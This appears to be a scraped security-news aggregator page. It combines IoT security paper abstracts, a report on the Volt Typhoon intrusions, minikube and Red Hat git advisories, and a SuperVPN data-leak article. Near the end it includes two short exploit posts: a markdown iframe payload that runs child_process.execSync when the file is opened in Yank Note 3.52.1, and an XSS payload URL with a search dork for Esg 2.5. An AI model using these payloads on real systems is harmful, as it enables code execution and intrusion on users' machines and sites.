Amazon Alexa software version 8960323972 on Echo Dot 2nd generation and 3rd generation devices potentially allows attackers to deliver security-relevant commands via an audio signal between 16 and 22 kHz (often outside the range of human adult hearing). Commands at these frequencies are essentially never spoken by authorized actors, but a substantial fraction of the commands are successful.

****Is There a Trojan! : Literature Survey and Critical Evaluation of the Latest Ml Based Modern Intrusion Detection Systems in Iot Environments****

Vishal Karanam, University of Southern California, Los Angeles, CA

**ABSTRACT**

IoT as a domain has grown so much in the last few years that it rivals that of the mobile network environments in terms of data volumes as well as cybersecurity threats. The confidentiality and privacy of data within IoT environments have become very important areas of security research within the last few years. More and more security experts are interested in designing robust IDS systems to protect IoT environments as a supplement to the more traditional security methods. Given that IoT devices are resource-constrained and have a heterogeneous protocol stack, most traditional intrusion detection approaches don’t work well within these schematic boundaries. This has led security researchers to innovate at the intersection of Machine Learning and IDS to solve the shortcomings of non-learning based IDS systems in the IoT ecosystem. Despite various ML algorithms already having high accuracy with IoT datasets, we can see a lack of sufficient production grade models. This survey paper details a comprehensive summary of the latest lear-based approaches used in IoT intrusion detection systems, and conducts a through critical review of these systems, potential pitfalls in ML pipelines, challenges from an ML perspective and discusses future research scope, and recommendations.

**KEYWORDS**

Intrusion Detection, IDS · IoT · Machine Learning · Deep Learning · Computer Security.

  
****An Architecture Forreliable Cyber Attack Detection in Iot Networks to Increase the Trustworthiness Between Nodes****

Dr.S.Malathi1 and S.Razool Begum2, 1Assistant Professor of Computer Science, Swami Dayananda College of Arts and Science,Manjakkudi.Tiruvarur(dt),Tamilnadu, India, Affiliated to Bharathidasan, University, 2Research Scholar, A.VeeriyaVandayar Memorial Sri Pushpam College(Autonomous), Thanjavur-613503,Tamilnadu, India, Affiliated to Bharathidasan University

**ABSTRACT**

The security qualities of IoT trustworthiness are combined with information technology (IT) that are safety, safety, consistency, flexibility, and privacy. Traditional security tools and procedures are insufficient to protect IoT platforms because of the differences in protocols, restricted update options, protocol mismatch, and outdated operatingsystem utilized in the Industrial system. In this paper, a scalable and reliable cyber-attack identification method to enhance the credibility of an IoT network (i.e. a supervisory control and data acquisition (SCADA) network). In particular, an ensemble-learning model that is a combination of a random subspace (RS) learning approach and a random tree (RT) learning method for identifying cyber-attacks utilizing network traffic from SCADA-based IoT platforms. The proposed model is unique and it employs industrial protocol-based network traffic where random subspace (RS) resolves the susceptibility of unnecessary characteristics,and ensemble random tree (RT) to minimize the overfitting issue, resulting in a detection engine based on industrial protocols with better detection rates.

**KEYWORDS**

Cyber-attack, traffic, protocol, random subspace, random tree, SCADA, and ensemble approach.

  
****Iot Enabled Human Health Monitoring System****

Aryaa, Deepak Kumar, Harsh Sharma, Aditi Saini, Pravin Kaushik, Dept. of Electronic and Communication Engineering KIET Group of Institution Ghaziabad, India

**ABSTRACT**

The goal of this paper is to develop a human health monitoring system (HHMS) that aids in earlier diagnosis of a human being and monitoring following recovery. The concept uses a combination of two subsystems which monitors the human health parameters such as temperature, SpO2, Heart Rate, ECG, and also the environment parameters such as temperature and humidity. The human characteristics are extracted using a variety of sensors, and the data is then analysed on a mobile application subsystem through an Internet of Things (IoT) subsystem. Findings have successfully proven using the HHMS prototype to constantly measure body temperature, heart rate, SpO2, ECG, and surrounding temperature and humidity. Our mobile application evaluates how reliable the method is for tracking these metrics.

**KEYWORDS**

IoT, Health Monitoring, ESP-32.

  
****Nuance: Near Ultrasound Attack on Networked Communication Environments****

Forrest McKee and David Noever, PeopleTec, 4901-D Corporate Drive, Huntsville, AL, USA, 35805

**ABSTRACT**

This study investigates a primary inaudible attack vector on Amazon Alexa voice services using near ultrasound trojans and focuses on characterizing the attack surface and examining the practical implications of issuing inaudible voice commands. The research maps each attack vector to a tactic or technique from the MITRE ATT&CK matrix, covering enterprise, mobile, and Industrial Control System (ICS) frameworks. The experiment involved generating and surveying fifty near-ultrasonic audios to assess the attacks' effectiveness, with unprocessed commands having a 100% success rate and processed ones achieving a 58% overall success rate. This systematic approach stimulates previously unaddressed attack surfaces, ensuring comprehensive detection and attack design while pairing each ATT&CK Identifier with a tested defensive method, providing attack and defense tactics for prompt-response options.The main findings reveal that the attack method employs Single Upper Sideband Amplitude Modulation (SUSBAM) to generate near-ultrasonic audio from audible sources, transforming spoken commands into a frequency range beyond human-adult hearing. By eliminating the lower sideband, the design achieves a 6 kHz minimum from 16-22 kHz while remaining inaudible after transformation. The research investigates the one-to-many attack surface where a single device simultaneously triggers multiple actions or devices. Additionally, the study demonstrates the reversibility or demodulation of the inaudible signal, suggesting potential alerting methods and the possibility of embedding secret messages like audio steganography.

**KEYWORDS**

Cybersecurity, voice activation, digital signal processing, Internet of Things, ultrasonic audio.

CVE-2023-33248: International Conference on Cloud, IoT and Security (CIOS 2023)

According to Microsoft and researchers, the state-sponsored threat actor could very well be setting up a contingency plan for disruptive attacks on the US in the wake of an armed conflict in the South China Sea.

China-sponsored threat actors have managed to establish persistent access within telecom networks and other critical infrastructure targets in the US, with the observed purpose of espionage — and, potentially, the ability down the line to disrupt communications in the event of military conflict in the South China Sea and broader Pacific.

That's according to a breaking investigation from Microsoft, which dubs the advanced persistent threat (APT) "Volt Typhoon." It's a known state-sponsored group that has been observed carrying out cyber espionage activity in the past, by researchers at Microsoft, Mandiant, and elsewhere.

While espionage appears to be the goal for now, there could very well be a more sinister purpose at play. "Microsoft assesses with moderate confidence that this Volt Typhoon campaign is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises," according to the analysis.

The first signs of compromise emerged in telecom networks in Guam, according to a New York Times report ahead of the findings being released. The National Security Agency discovered those intrusions around the same time that the Chinese spy balloon was making headlines for entering US airspace, according to the report. It then enlisted Microsoft to further investigate, eventually uncovering a widespread web of compromises across multiple sectors, with a particular focus on air, communications, maritime, and land transportation targets.

**A Shadow Goal? Laying Groundwork for Disruption**

The discovery of the activity is playing out against the backdrop of the US' frosty relations with Beijing; the two superpowers have stalled in their diplomacy since the shooting down of the balloon, and has worsened amidst fears that Russia's invasion of Ukraine could spur China to do the same in Taiwan.

In the event of a military crisis, a destructive cyberattack on US critical infrastructure could disrupt communications and hamper the country's ability to come to Taiwan's aid, the Times report pointed out. Or, according to John Hultquist, chief analyst at Mandiant Intelligence - Google Cloud, a disruptive attack could be used as a proxy for kinetic action.

"These operations are aggressive and potentially dangerous, but they don't necessarily indicate attacks are looming," he said in an emailed statement. "A far more reliable indicator for \[a\] destructive and disruptive cyberattack is a deteriorating geopolitical situation. A destructive and disruptive cyberattack is not just a wartime scenario either. This capability may be used by states looking for alternatives to armed conflict."

Dubbing such preparations "contingency intrusions," he added that China is certainly not alone in conducting them — although notably, China-backed APTs are typically far more focused on cyber espionage than destruction.

"Over the last decade, Russia has targeted a variety of critical infrastructure sectors in operations that we do not believe were designed for immediate effect," Hultquist noted. "Chinese cyber threat actors are unique among their peers in that they have not regularly resorted to destructive and disruptive cyberattacks. As a result, their capability is quite opaque."

**An Observed Focus on Stealth & Spying**

To achieve initial access, Volt Typhoon compromises Internet-facing Fortinet FortiGuard devices, a popular target for cyberattackers of all stripes (Microsoft is still examining how they're being breached in this case). Once inside the box, the APT uses the device's privileges to extract credentials from Active Directory account and authenticate to other devices on the network.

Once in, the state-sponsored actor uses the command line and living-off-the-land binaries "to find information on the system, discover additional devices on the network, and exfiltrate data," according to the analysis.

To cover its tracks, Volt Typhoon proxies its network traffic through compromised small office/home office (SOHO) routers and other edge devices from ASUS, Cisco, D-Link, NETGEAR, and Zyxel — that allows it to blend into normal network activity, Microsoft researchers noted.

The post also provides mitigation advice and indicators of compromise, and the NSA has published a tandem advisory on Volt Typhoon (PDF) with details on how to hunt for the threat.

'Volt Typhoon' China-Backed APT Infiltrates US Critical Infrastructure Orgs

This vulnerability exposes a network port in minikube running on macOS with Docker driver that could enable unexpected remote access to the minikube container.

**Vellore Rajakumar, Sri Saran Balaji**

unread,

Apr 12, 2023, 8:38:30 PMApr 12

to kubernete...@googlegroups.com, d...@kubernetes.io, kubernetes-sec...@googlegroups.com, kubernetes-se...@googlegroups.com, distributo...@kubernetes.io, kubernetes+a...@discoursemail.com

Hello Kubernetes Community,

We have released minikube v1.30.0 to address two security issues in minikube. We recommend all to upgrade minikube to the latest version and delete any Kubernetes clusters created with an affected version. Minikube is a utility tool that sets up a Kubernetes environment on a local machine for developing and testing Kubernetes applications. Minikube is not intended for production use.

**CVE-2023-1174: Network port exposure**

This vulnerability exposes a network port in minikube running on macOS with Docker driver that could enable unexpected remote access to the minikube container. This issue has been rated **CRITICAL** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) (score: 9.8).

**Am I vulnerable?**

This CVE only affects clusters running on macOS with Docker drivers. If you have created the Kubernetes cluster using one of the below mentioned minikube versions, then you are affected by this vulnerability. 

**Affected Versions**

• v1.28.0

• v1.27.1

• v1.27.0

• v1.26.1

• v1.26.0

You can also run the following command to know if you are affected. If the command returns 0.0.0.0 then you are affected by this vulnerability.

\`docker inspect --format='{{(index (index .NetworkSettings.Ports "8443/tcp") 0).HostIp}}' minikube\`

**CVE-2023-1944: SSH access using default password**

This vulnerability enables ssh access to minikube container using a default password. This issue has been rated **HIGH** (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) (score: 8.4).

**Am I vulnerable?**

All versions prior to v.1.30.0 are affected.

To find the version deployed in your environment, run the following command - 

\`minikube version\`

**How do I remediate these vulnerabilities?**

To mitigate these vulnerabilities, you must upgrade minikube to the latest version and delete any clusters created using an affected version.

**Fixed Version**

• v1.30.0

**Note**: To delete clusters created using prior versions, run \`minikube delete --all\`

Thank You,

Balaji on behalf of the Kubernetes Security Response Committee

CVE-2023-1174: [Security Advisory] CVE-2023-1174, CVE-2023-1944: Network port exposure and ssh access using default password

This vulnerability enables ssh access to minikube container using a default password.

**minikube**

   

minikube implements a local Kubernetes cluster on macOS, Linux, and Windows. minikube's primary goals are to be the best tool for local Kubernetes application development and to support all Kubernetes features that fit.

**Features**

minikube runs the latest stable release of Kubernetes, with support for standard Kubernetes features like:

*   LoadBalancer - using minikube tunnel
*   Multi-cluster - using minikube start -p <name>
*   NodePorts - using minikube service
*   Persistent Volumes
*   Ingress
*   Dashboard - minikube dashboard
*   Container runtimes - minikube start --container-runtime
*   Configure apiserver and kubelet options via command-line flags
*   Supports common CI environments

As well as developer-friendly features:

*   Addons - a marketplace for developers to share configurations for running services on minikube
*   NVIDIA GPU support - for machine learning
*   Filesystem mounts

**For more information, see the official minikube website**

**Installation**

See the Getting Started Guide

📣 **Please fill out our fast 5-question survey** so that we can learn how & why you use minikube, and what improvements we should make. Thank you! 👯

**Documentation**

See https://minikube.sigs.k8s.io/docs/

**More Examples**

See minikube in action here

**Community**

minikube is a Kubernetes #sig-cluster-lifecycle project.

*   **#minikube on Kubernetes Slack** - Live chat with minikube developers!
    
*   minikube-users mailing list
    
*   minikube-dev mailing list
    
*   Contributing
    
*   Development Roadmap
    

Join our meetings:

*   Bi-weekly office hours, Mondays @ 11am PST
*   Triage Party

CVE-2023-1944: GitHub - kubernetes/minikube: Run Kubernetes locally

By Habiba Rashid
SuperVPN is the same free VPN service provider that leaked customers' data back in May 2022.
This is a post from HackRead.com Read the original post: Free VPN Service SuperVPN Exposes 360 Million User Records

This time, SuperVPN has exposed a whopping 133 GB of data, including personal details of its unsuspecting users, such as IP addresses.

In a recent cybersecurity incident, security researcher Jeremiah Fowler discovered a significant data breach in a non-password-protected database associated with a popular free VPN service.

The exposed database contained a staggering 360,308,817 records, totalling 133 GB in size. These records included a wide range of sensitive information, including user email addresses, original IP addresses, geolocation data, and server usage records.

Additionally, the breach revealed secret keys, Unique App User ID numbers, and UUID numbers, which can be utilized to identify further useful information.

Other information found in the database encompassed phone or device models, operating systems, internet connection types, and VPN application versions. Furthermore, refund requests and paid account details were also present in the breach.

Type of leaked data (VPNmentor)

While SuperVPN claims that it does not store user logs, the leaked data shows otherwise and contradicts the company’s policy. This also goes to show that “_Almost Every Major Free VPN Service is a Glorified Data Farm_.”

With the increasing concerns over online privacy and security, the demand for VPN services has soared in recent years. Consequently, the market has witnessed a significant rise in the number of VPN apps available to users.

However, this surge in offerings has resulted in an alarming proportion of VPN apps that are unreliable and fail to provide the expected level of privacy and security. This results in a counterproductive user experience since a lack of adequate security protocols puts their information at risk of being leaked in a data breach.

The majority of records in the exposed database, according to VPNmentor’s report, were associated with SuperVPN, a free VPN application available on both the Apple and Google application stores.

Furthermore, researchers noted two apps named SuperVPN listed, each credited to separate developers. Qingdao Leyou Hudong Network Technology Co. was the developer behind SuperVPN for iOS, iPad, and macOS, while SuperSoft Tech developed the second app with the same name.

However, it is important to note that this is NOT the first time SuperVPN has been blamed for leaking the personal details of its unsuspecting users. In fact, as reported by Hackread.com in May 2022, SuperVPN was among the list of free VPN services that leaked details of over 21 million users. Other free VPN services to leak customer data included GeckoVPN and ChatVPN. In total, the database contained 10GB worth of data that was leaked on Telegram.

In the report published by vpnMentor, Fowler noticed that SuperVPN’s customer support emails were linked to StormVPN, Luna VPN, RocketVPN and GhostVPN. Additionally, references to each of these VPN providers were observed within the database.

Type of leaked data (VPNmentor)

Although there is no way to confirm that they’re all owned by the same company, it would not come as a surprise if that were the case. The proliferation of unreliable VPN apps can be attributed to profit-driven developers seeking to capitalize on the growing demand for privacy and security.

The VPN industry has become highly lucrative, with millions of users worldwide seeking reliable solutions to safeguard their online presence. In this climate, some developers prioritize monetary gains over user safety, focusing on quick and inexpensive development, marketing, and distribution of VPN apps.

Therefore, for a single company to produce multiple VPN applications with different names and slightly varying user experiences would not be unlikely since that would allow it to cast a wider net over the users scouring for a suitable VPN provider.

When opting for a free VPN service, it’s essential to exercise caution and consider certain red flags that indicate potential risks. These include:

1.  Unclear data collection and usage policies: Verify that the VPN service doesn’t log your internet activity to avoid the risk of data being sold to advertisers or third parties.
2.  Lack of transparency: Pay attention to the absence of an “About Us” section on the VPN provider’s official website, as this can indicate a lack of information about who handles your data.
3.  DNS-leak protection: Ensure that the VPN service offers DNS-leak protection to prevent your internet service provider from seeing your online activities.
4.  Weak encryption: Avoid VPNs that offer encryption weaker than 128-bit or 256-bit AES, as this increases the risk of your data being compromised.
5.  Negative reviews: Read user reviews and consult reputable review sites to gauge the experiences and concerns of other users before choosing a VPN service.

The proliferation of VPN apps presents both opportunities and challenges for users seeking privacy and security in their online activities. While the market offers a wide range of reliable VPN solutions, the rising number of unreliable apps calls for caution and informed decision-making.

By understanding the factors contributing to the excess of VPN apps, identifying the risks associated with their usage, and implementing measures to mitigate these risks, users can make more informed choices to protect their online privacy and security.

**RELATED ARTICLES**

1.  Beware! This malware hides behind free VPNs
2.  What is an OSINT Tool – Best OSINT Tools 2023
3.  Leaked database of UFO VPN destroyed by hackers
4.  Mullvad VPN and Tor Project Release Mullvad Browser
5.  VPN firm that claims 0 logs policy leaks 20m user logs

Free VPN Service SuperVPN Exposes 360 Million User Records

Red Hat Security Advisory 2023-3263-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:3263-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3263  
Issue date:        2023-05-23  
CVE Names:         CVE-2023-25652 CVE-2023-29007   
=====================================================================

1. Summary:

An update for git is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: by feeding specially crafted input to `git apply --reject`, a path  
outside the working tree can be overwritten with partially controlled  
contents (CVE-2023-25652)

* git: arbitrary configuration injection when renaming or deleting a  
section from a configuration file (CVE-2023-29007)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2188333 - CVE-2023-25652 git: by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents  
2188338 - CVE-2023-29007 git: arbitrary configuration injection when renaming or deleting a section from a configuration file

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-daemon-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-daemon-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64le.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-daemon-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.s390x.rpm  
git-svn-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGzKg9zjgjWX9erEAQhQNQ//QfOqb56Pkppxh/2ftKCQT0rWX4HllcRU  
O+NEKAmDXJKmI2cFDGiGzbhFK2UeEDPBd1lszD+44kOdUNWrJi4OHbWVq0hLVXKM  
qxAJLGV1mIm5mTpBHZh9bJ6hrkpekh8svuEtZcT4Q+ZykeA8cEQX5jpFtUJJqTZd  
tkzx8ijU2Xb3Ufawerogu6Vo8tPle2XD79M6b0Uf34NvDHtyEudyRQseZHZIgMer  
aUkriuvw0MjVLs8Sl5/DKC1PoKm9waTeYVPsovmlNcFD1IllBA6bba2qcsOS2gIb  
BSWhyon8cq4OpDSNhASWVF36U/nM33IPFto1cgiwhapit6HbO2jhqWUQnbrA5hOO  
mkUJrQWylOH6ymIprmVV0yBC3m4NwTcevM7fjdZaeMe4WcHizOCAz7gJ3kYbgd1v  
EZSnXtm5/tenxjFxTn64D1psuEg5dG/qamr51o2RQRpTuW9qJuV22+jMt676fuOr  
V3AAeUi6d+d5TD3dKO5KV3OTn2p9x+OkeXj2+Pn5F4Le2KT+JyJ6MtPh70HbuF4P  
OH6EbN8aLLlVzdIYPOg8TY4/dr7pyqqHK1p4XEnsFbcIHADm6AizDep+3E0TgnbU  
AEphXpmipQRPezqXgk66qNBXL9PM1iwKnGckL76i5/rDK1yW6wCnAq8A0TbkDFq1  
/fL8GIBuo5E=  
=/li4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3263-01

Yank Note version 3.52.1 suffers from an arbitrary code execution vulnerability.

    # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution# Date: 2023-04-27# Exploit Author: 8bitsec# CVE: CVE-2023-31874# Vendor Homepage: yank-note.com# Software Link: https://github.com/purocean/yn# Version: 3.52.1# Tested on: [Ubuntu 22.04 | Mac OS 13]Release Date: 2023-04-27Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacementTechnical Details & Description:A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.Proof of Concept (PoC):Arbitrary code execution:Create a markdown file (.md) in any text editor and write the following payload.Mac:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">Ubuntu:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">Opening the file in Yank Note will auto execute the Calculator application.

Yank Note 3.52.1 Arbitrary Code Execution

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
